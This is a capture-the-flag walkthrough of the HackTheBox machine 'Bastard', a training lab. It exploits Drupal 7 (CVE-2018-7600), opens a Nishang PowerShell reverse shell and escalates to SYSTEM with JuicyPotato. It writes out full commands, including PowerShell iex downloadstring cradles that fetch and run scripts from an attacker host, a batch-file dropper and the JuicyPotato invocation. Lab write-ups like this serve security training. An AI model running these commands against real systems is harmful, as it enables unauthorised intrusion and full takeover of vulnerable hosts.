HackTheBox “Bastard” Walkthrough
In this walkthrough, we delve into the HackTheBox machine named “Bastard.” By exploiting the Drupal 7 vulnerability (CVE-2018–7600), we gain command execution. Afterwards, we establish a reverse shell and showcase the privilege escalation exploit known as SeImpersonatePrivilege (potato attack).
Let’s get started!🚀
Recon & Enumeration
Let’s use nmap to scan for open ports and services:
We see the presence of Drupal 7. To determine the exact version, we can leverage the changelog file.
Let’s see what information the browser will display to us.
Furthermore, based on the page source code, we can confirm that it is Drupal 7.
We will now conduct a searchsploit for known exploits targeting Drupal version 7.
To refine the results and discover a more suitable exploit, I will search on Google.
Upon testing multiple listed exploits, I determined that the one by pimps was the most effective. You can find it here.
I proceeded to copy the RAW script and saved it as “drupal.py.”
We download it to our attack box.
The script is straightforward. You only need to provide the command to execute and the target (website). It will exploit the service and provide the command’s output as a result.
I will now obtain a reverse shell on the target.
To achieve this, I will utilize the “Invoke-PowerShellTcp.ps1” script from Nishang Scripts, which can be found here.
After acquiring a copy of the script on my attacker machine, I placed it in my working directory and added the following command at the end:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4343
Next, we run an HTTP server within the working directory of our attack box.
We initiate a netcat listener on port 4343 to capture the incoming shell.
We execute the command below to download and execute the script directly into memory:
python3 drupal.py -c "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')" http://10.10.10.9
The script file has been successfully downloaded from our attack box.
Consequently, we establish a shell on our listener.
After gaining a shell on the target box, I proceeded to conduct manual enumeration, commencing with gathering system information.
The obtained information reveals valuable details. Firstly, the OS is Windows Server 2008 R2 without any installed hotfixes, indicating vulnerability to a kernel exploit. Moreover, it confirms that the host operates on a 64-bit system, which is pertinent when utilizing tools.
Subsequently, I proceeded to collect information about the current user’s privileges using the following command:
The finding of enabled SeImpersonatePrivilege implies that I can leverage a potato attack to escalate privileges to SYSTEM.
Obtain a copy of JuicyPotato.exe from this GitHub repository here, ensure to acquire the 64-bit version of the executable.
Meanwhile, our HTTP server in the working directory of our attacking box remains operational.
Create a temp directory within the C partition.
We proceed to download JuicyPotato onto the target machine.
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.4:8080/JuicyPotato.exe', 'C:\temp\JuicyPotato.exe')
Let’s execute the exploit and see the outcome.
In order to run the tool successfully, we require a port number for the COM server and a valid CLSID. There are two options: either use the provided list by the tool authors corresponding to the system version or execute the following PowerShell script to extract the CLSID of the current system:
I will use a batch script to download the Nishang PowerShell script. On the attacker machine, use the following command to craft a batch script:
echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5:8080/Invoke-PowerShellTcp.ps1')" > shell.bat
Download the batch script onto the target box using the command below.
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8080/shell.bat', 'C:\temp\shell.bat')
The setup is complete, and we are ready to proceed with the exploit. In case the default CLSID fails, the exploit publisher has provided a list of alternative CLSIDs for testing, available here.
Considering that the target system runs Windows Server 2008 R2, the following CLSIDs are applicable:
Let’s proceed with using the first CLSID from the list.
C:\temp\JuicyPotato.exe -l 4343 -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
Returning to the listener, I successfully obtained a SYSTEM shell.
Cheers.
